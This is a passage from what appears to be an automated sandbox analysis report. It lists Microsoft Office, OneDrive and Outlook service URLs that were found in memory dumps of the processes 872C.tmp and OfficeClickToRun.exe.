    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/quickaccess/sitesandteams
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/v2/recent
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/help/clientdeveloper
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/catalog5
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/liveredir?
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/liveredirgSource
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/manageserviceredir.aspx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/reportserviceerror
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/serviceaddr
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/v
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/onedrive_48_2.pngad
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/onedrive_48_2.pngfop
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392526638.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393537508.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430628419.0000000005637000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392526638.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393537508.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430628419.0000000005637000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellI
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImagehttps:
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellY
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpselllickr
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net6
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/237
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057344669.00000248C0D3D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060999948.00000248C3221000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2041372305.00000248C3212000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com03329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com1
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.comalBiascW
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B0D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057344669.00000248C0D3D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 